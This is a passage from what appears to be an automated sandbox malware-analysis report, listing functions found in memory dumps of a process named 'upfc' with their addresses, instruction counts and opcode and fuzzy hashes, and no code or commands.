                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6bc773260e40b54e947dbf5e99c089739457c12c4977cb2198999a605d6f8f86
                                                      • Instruction ID: d0fde34238278cb965c3b00c740e30593dda4e484af6ead1b0a9ffc1203b96e4
                                                      • Opcode Fuzzy Hash: 6bc773260e40b54e947dbf5e99c089739457c12c4977cb2198999a605d6f8f86
                                                      • Instruction Fuzzy Hash: A972A370A1895A8FE758FF2988557B9B3E2FF59320F5405B9D00EC7283DE74AC818B91
                                                      Function 00007FF7C17A16EB Relevance: .7, Instructions: 653COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17a0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b85975b5a65e5737b2319feca16d132d4533bd685d23ace22d85eba791194c6a
                                                      • Instruction ID: 9b1081260727171a75ee00019e0bd23a8b7d2c8c5d66818a6d93da623bb756dc
                                                      • Opcode Fuzzy Hash: b85975b5a65e5737b2319feca16d132d4533bd685d23ace22d85eba791194c6a
                                                      • Instruction Fuzzy Hash: 60228070A1895A8FE748EF2984957B9F3E1FF59350F5445B9D00EC3283CE74B8968B81
                                                      Function 00007FF7C1CA5709 Relevance: .4, Instructions: 367COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed27216806a7f1a5f8f559710138e3683a2663719b1d3479f3a5f2ff1266b523
                                                      • Instruction ID: 7b4550724036e1d84964835cfcb31d14431978c33954712845883432c8160998
                                                      • Opcode Fuzzy Hash: ed27216806a7f1a5f8f559710138e3683a2663719b1d3479f3a5f2ff1266b523
                                                      • Instruction Fuzzy Hash: 7CB14330658949CFEB95FF28C055EB9B3E2EFA8310B644579E10EC72A2DE64EC41CB51
                                                      Function 00007FF7C17B91A1 Relevance: .3, Instructions: 318COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80a21cc17ca183508106883e436efacf64282ee9efe6618f6e20fcb1518f78fb
                                                      • Instruction ID: d98df623ae946c959b91fa5e036baeded0a0aef6cf7954bbba0a5f07464a92f1
                                                      • Opcode Fuzzy Hash: 80a21cc17ca183508106883e436efacf64282ee9efe6618f6e20fcb1518f78fb
                                                      • Instruction Fuzzy Hash: C9A1A470A189494FEB48EF2CC4946A9B7E2FFA8360F504679D41DC32D6CF78A842CB50
                                                      Function 00007FF7C1B833FC Relevance: .3, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1c07a457c5443de2063e333d485e893a11bee2b5afa0445b2b305d99810bc022
                                                      • Instruction ID: 566f32d99f4b4e30c352d98e987841ba6e0b769820d995c7d1c7becd2aaa055d
                                                      • Opcode Fuzzy Hash: 1c07a457c5443de2063e333d485e893a11bee2b5afa0445b2b305d99810bc022
                                                      • Instruction Fuzzy Hash: 31213441E0D593CBF3257F2D54112BCE7006F05B39F98923ED40E82AE2CE88F4945BA2
                                                      Function 00007FF7C1CA20B1 Relevance: .2, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0ab696084e0bdff7f4ef4c10c727fc260a3755e79ddb4a11d0f5aa7d65bff8a
                                                      • Instruction ID: ce8cee380acf7d5ccd81e0c7c21a7922a70f234c46319dd3ac5ebbd6c874cef1
                                                      • Opcode Fuzzy Hash: e0ab696084e0bdff7f4ef4c10c727fc260a3755e79ddb4a11d0f5aa7d65bff8a
                                                      • Instruction Fuzzy Hash: D341F931B0CA188FD758EB1C98556B5B7E2FF99720B1401BFE14EC72A3CD24AC418751
                                                      Function 00007FF7C1CA64E7 Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97d855e2959c4173681c04210807b8590a66cafcf15c85097ceed7eb0a997cec
                                                      • Instruction ID: cba89ee847937831fef4896439f3834128936f1573cef10c9d24448494b498c0
                                                      • Opcode Fuzzy Hash: 97d855e2959c4173681c04210807b8590a66cafcf15c85097ceed7eb0a997cec
                                                      • Instruction Fuzzy Hash: 2B41C47091C9498FDBA9EF18C485EB9B7E0FF68310F600579E54AC7291DE24E842CB91
                                                      Function 00007FF7C1CA59B9 Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6af43dec40949e24cabe13828f0662baabfbd94d776e6137963ffa52c7a78e7a
                                                      • Instruction ID: ff31ded53f56c852e9dd4b4f6ed4a1b77d53248f4ff7ce5f53bb5072f4d0ef81
                                                      • Opcode Fuzzy Hash: 6af43dec40949e24cabe13828f0662baabfbd94d776e6137963ffa52c7a78e7a
                                                      • Instruction Fuzzy Hash: 9D413030618909CFDBA9EF18C4A5AB9B3E1FFA8311B644579E10FC3691DE74ED408B51
                                                      Function 00007FF7C1CA5A28 Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56ec684dc525c8239c120bf2a60a2690f6a406e9452151692696f4eee4543ee6
                                                      • Instruction ID: 02124abc37d9aec393e3aa1c0963c7e5839845734341dfee845bbcc59a61cd0f
                                                      • Opcode Fuzzy Hash: 56ec684dc525c8239c120bf2a60a2690f6a406e9452151692696f4eee4543ee6
                                                      • Instruction Fuzzy Hash: BA411B30608909CFDB99EF18C4A5AB9B3E1FFA8311B654579E10FC36A1CE74EC448B91
                                                      Function 00007FF7C1B877D7 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4e2ee881d680e3b9354482e051fd49afe6d1631cb6190e9a84b96eee16dac0fd
                                                      • Instruction ID: 5633f0d128d0d01db46d6b5db4d840e0384a957862c8ccd952cd1a2fb6d15c94
                                                      • Opcode Fuzzy Hash: 4e2ee881d680e3b9354482e051fd49afe6d1631cb6190e9a84b96eee16dac0fd
                                                      • Instruction Fuzzy Hash: 1C41603160C9498FDB48EF28C499EA4F3E1FFA9320B14026AD00EC3692CE34F855CB81
                                                      Function 00007FF7C1B827C7 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1fa45554fd146803ffe0628ee4a6ba628d38fb8405e9ddae21b1af9c9e57ef7
                                                      • Instruction ID: d3918d7fc949ef56bf63bb34b28a04cd00a9a3d363164349044f33635f6ffde4
                                                      • Opcode Fuzzy Hash: d1fa45554fd146803ffe0628ee4a6ba628d38fb8405e9ddae21b1af9c9e57ef7
                                                      • Instruction Fuzzy Hash: 8C411A3560C9499FDB88EF28C495AA5B3E1FFA9320B1405AAD00EC3692DE35F855CB81
                                                      Function 00007FF7C1790908 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction ID: 9b4ad1c0e72a6ae5086112e2a43da609e4b6cb73fe4f2b2bdf9a8ea44726b337
                                                      • Opcode Fuzzy Hash: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction Fuzzy Hash: D721A63130CC184FE768EA1CE88ADB977D1EB9932171501BAE58AC7266ED51EC9287C1
                                                      Function 00007FF7C1B82871 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef4d97dd2639910337e24407ce474e33fc886600ec5d80fa2344e61a2732fc92
                                                      • Instruction ID: 4578caff4540e17c9a08870f56540087d1dfbd4a862ee2ae59bd51824a49f54c
                                                      • Opcode Fuzzy Hash: ef4d97dd2639910337e24407ce474e33fc886600ec5d80fa2344e61a2732fc92
                                                      • Instruction Fuzzy Hash: B4316B706089498FDB89EF28C498EA5B3E1FF69310B1406AED01EC7292CE30F855CB81
                                                      Function 00007FF7C1B87881 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbebefcd13a07a3f660fa0057882243a17ba182eb4d8edb1e582dae057dbae23
                                                      • Instruction ID: 489fa761fdd562e60e9485dd93c158c05d1f2c085288301f972952950a053282
                                                      • Opcode Fuzzy Hash: cbebefcd13a07a3f660fa0057882243a17ba182eb4d8edb1e582dae057dbae23
                                                      • Instruction Fuzzy Hash: 513170306089488FDB4DEF28C058EA4B7E1FFA931171406AAD00EC7692CE34F855CB81
                                                      Function 00007FF7C179090D Relevance: .1, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8afb2f6241ccea42320a4dc92b521ed47a23421fecb5d5613e7d4b295d53ceb
                                                      • Instruction ID: 9b72cf491f54d34a68b2c5dac61be41d3656bca523b294f049c61a73a2bc2d51
                                                      • Opcode Fuzzy Hash: e8afb2f6241ccea42320a4dc92b521ed47a23421fecb5d5613e7d4b295d53ceb
                                                      • Instruction Fuzzy Hash: D2310512E0CA655BE314B77C645E7F9A785DF48375F14457BD04DC62A3CE68B8818284
                                                      Function 00007FF7C17B255B Relevance: .1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6e16a77b228e5801ba1b023d8022086ad352fd5527326006c99a10ae7675bfe
                                                      • Instruction ID: 2aa817fade72a91f733caa76c06e5ebefb0495bd3097d3b1fe503daed3412c23
                                                      • Opcode Fuzzy Hash: d6e16a77b228e5801ba1b023d8022086ad352fd5527326006c99a10ae7675bfe
                                                      • Instruction Fuzzy Hash: 334159A448F3C16FC703AB754C345A2BFB89E5712A71D85EBE0D5CA0A3D64C295AC323
                                                      Function 00007FF7C1B8781B Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f5c03f56f2914b16a95d27d571f7a7bfd2959932e36b5c6e151c1d9eb304d9a
                                                      • Instruction ID: cae0bc6cdfbf67eecc84350cc0c101fe1a19fd6041b13f071a616c0e6b913f40
                                                      • Opcode Fuzzy Hash: 7f5c03f56f2914b16a95d27d571f7a7bfd2959932e36b5c6e151c1d9eb304d9a
                                                      • Instruction Fuzzy Hash: A1314C746089498FDB4CEF28C099EA4B7E1FFA9310B1446AAD00EC7692CE34F855CB81
                                                      Function 00007FF7C1B8280B Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98a7f9b5d77b94cb7166ba7135db602d1d83c5ae80daa188e6efb28eade09219
                                                      • Instruction ID: 55b129a46d23bed0dbdbb7f593cf62839db644c085d963395185592493edf330
                                                      • Opcode Fuzzy Hash: 98a7f9b5d77b94cb7166ba7135db602d1d83c5ae80daa188e6efb28eade09219
                                                      • Instruction Fuzzy Hash: 36313A706089499FDB98EF28C499EA5B3E1FF69310B1406ADD00EC7692CF34F855CB81
                                                      Function 00007FF7C1CA7665 Relevance: .1, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42b2d7f6bbc08e34ae93c2180690560c2eea2e66f51b01152903ada4e336b56e
                                                      • Instruction ID: f16381b5ac8d082bca6f563eeba1252440462b0a047afd0a35c4e786b47b0755
                                                      • Opcode Fuzzy Hash: 42b2d7f6bbc08e34ae93c2180690560c2eea2e66f51b01152903ada4e336b56e
                                                      • Instruction Fuzzy Hash: 2231F532A08A1D8FEB65EB18D8546ECB7E1FB98330F55017BE40ED3292CD695C5687D0
                                                      Function 00007FF7C17911A1 Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c17f4060b1c88c64378346ca0fca0d50390cd54406f2496741d42caba532c8
                                                      • Instruction ID: 266f9470073b824c60f554db7d43638643f96ce5a5b0098f2a535c3519c39d34
                                                      • Opcode Fuzzy Hash: a2c17f4060b1c88c64378346ca0fca0d50390cd54406f2496741d42caba532c8
                                                      • Instruction Fuzzy Hash: B331847190D64A8FDB45EB79C8599A9BBF0FF1B320F4405FAC019CB2E3DA68A845C750
                                                      Function 00007FF7C1B875E5 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0956876679bc13096153af99d9f5827bbe7b2d9f5e603aa852ceb54e77157ae5
                                                      • Instruction ID: bae3b25347795f248908c69a21f7af0b35c26808ca94670afe24f8dbdeba23bf
                                                      • Opcode Fuzzy Hash: 0956876679bc13096153af99d9f5827bbe7b2d9f5e603aa852ceb54e77157ae5
                                                      • Instruction Fuzzy Hash: F6313A3091C94ACFEB98EF5884559BDBBB1FF44718F90117EE40ED2991CBB8A8409F51
                                                      Function 00007FF7C1CA6548 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1c0fa16f1573ec14e5cf69df1bc843ba231701b384c37514fedb65e0a26e8d1
                                                      • Instruction ID: 9475c919e7055d500bf19788a80d8824934a16bbdae23984e3a65bec9b47c0c3
                                                      • Opcode Fuzzy Hash: a1c0fa16f1573ec14e5cf69df1bc843ba231701b384c37514fedb65e0a26e8d1
                                                      • Instruction Fuzzy Hash: E231447060C8498FDF85EF28C499EA5B7E1FF79310B1445A9D40AC72A6DE34F885CB91
                                                      Function 00007FF7C1790998 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4cb9e8afdd6b59b459346b8ce731122e8ffbe6b73f3e5bfa316523a0c113cfb4
                                                      • Instruction ID: bc73e25c2624dc0b134484f916e6f44ec72b47b62122eb9b9a351fb32996b651
                                                      • Opcode Fuzzy Hash: 4cb9e8afdd6b59b459346b8ce731122e8ffbe6b73f3e5bfa316523a0c113cfb4
                                                      • Instruction Fuzzy Hash: 9A21D420B28D590FE748B72D9459775B2C6EF9C321F5000B9E80EC33D7DD64AC414295
                                                      Function 00007FF7C1B814C0 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d5183a1f1f4bdf2ad90b69ea28c96fc331f80e34ebde87206e44ed3c64d8583
                                                      • Instruction ID: 0d96c4624b99c466c8a584709f020ff2ebb702b9dd8a06cbcfc555072041c43b
                                                      • Opcode Fuzzy Hash: 7d5183a1f1f4bdf2ad90b69ea28c96fc331f80e34ebde87206e44ed3c64d8583
                                                      • Instruction Fuzzy Hash: EE31071095E5968FF71A9F1854605F4BB61BF53321B1C46BEC08F8B8D7C468A8858B61
                                                      Function 00007FF7C1B864D1 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6507093be24ab9ca5151169a8f781f21f6710c5e5a54f953a66bcb43d91c30f5
                                                      • Instruction ID: 05828a9e4e5c24aa0d0b4a3023c24a8a8043d3f23ed849f91c89d1df5db3a8aa
                                                      • Opcode Fuzzy Hash: 6507093be24ab9ca5151169a8f781f21f6710c5e5a54f953a66bcb43d91c30f5
                                                      • Instruction Fuzzy Hash: 97215B2091C59B4FF3199F1884646F4FB51FF5132175846BDC09ACB99FCA68F8828BB0
                                                      Function 00007FF7C1B838D2 Relevance: .1, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 347dd9519ef3b0771de81451a3fb43c5e5db620e357e64d8e08ff0dbed6b422d
                                                      • Instruction ID: f3bffd79133b0826e8950509406efad43da6edb1a18777534a14dd32d1dc0103
                                                      • Opcode Fuzzy Hash: 347dd9519ef3b0771de81451a3fb43c5e5db620e357e64d8e08ff0dbed6b422d
                                                      • Instruction Fuzzy Hash: 4821C770A1481D9FDB98EF58C4A5AEDB7B1FF68310F5041AE900EE3692CA74A9418F40
                                                      Function 00007FF7C1B82D88 Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 72d723db95005d1c47716052bb6c2bf3e4d56222fb8fdf3d964a260e29cc22d3
                                                      • Instruction ID: 4c6f07997317a5983a04eef394a0d8cd28164eaed055da33842a014742e3d625
                                                      • Opcode Fuzzy Hash: 72d723db95005d1c47716052bb6c2bf3e4d56222fb8fdf3d964a260e29cc22d3
                                                      • Instruction Fuzzy Hash: 62211A3091898EDFEB88EF58D8505ADBBB1FF58310F5011BAD40AE7292CA74A801CB65
                                                      Function 00007FF7C1790C25 Relevance: .1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24bf98907c49988fa6cd5c3f74b9d78550afbe1a0ecca1a5ea9273bb323bb406
                                                      • Instruction ID: b071551ded3eeb5409717a509de535c0b1888ef5c907700d799453d8e9809184
                                                      • Opcode Fuzzy Hash: 24bf98907c49988fa6cd5c3f74b9d78550afbe1a0ecca1a5ea9273bb323bb406
                                                      • Instruction Fuzzy Hash: 6621F03591C7898FE302AF7988482ECBBA4EF46334F5445B6C0449B2D3DA786549CBA1
                                                      Function 00007FF7C1CA55DF Relevance: .1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9489247200e3019e831192df79146eaaf67aa1d80871a078674f4391f717b056
                                                      • Instruction ID: c866ed0407a282f35721b779cdcbacd6bca6d4e03cfe288992f3d017cd7dca1b
                                                      • Opcode Fuzzy Hash: 9489247200e3019e831192df79146eaaf67aa1d80871a078674f4391f717b056
                                                      • Instruction Fuzzy Hash: 1011301084E3C29FD7675B349820564BFB06F5322076A85F7D189CA193CA8C580AD762
                                                      Function 00007FF7C1CA5CAE Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a1469fb164791892c6964b019457a1d9a6c248d1a7afffb9574396df5506876
                                                      • Instruction ID: 6120a96b30598313c2c96379cadf9e0fc34df9420e095ee73f456c44dadb53a0
                                                      • Opcode Fuzzy Hash: 9a1469fb164791892c6964b019457a1d9a6c248d1a7afffb9574396df5506876
                                                      • Instruction Fuzzy Hash: 6A215170A08849DFD7D5EF188498A69B3E1FFA8310B244679D00EC7297CE34A841CB51
                                                      Function 00007FF7C1CA6BC5 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f3877b73b8c5c0ff61556d6628f00838850947d16483585dca201cb52adf0dd
                                                      • Instruction ID: 3ae73a94360e3579e6d72f2ae5278340598a0d6960e35817cd7b967a96251d7c
                                                      • Opcode Fuzzy Hash: 8f3877b73b8c5c0ff61556d6628f00838850947d16483585dca201cb52adf0dd
                                                      • Instruction Fuzzy Hash: 7B21C33094C6698FE726EB188854BA4B7E0FF54314F9405B9D00AC75C2CBBD6855CB90
                                                      Function 00007FF7C1B814F0 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
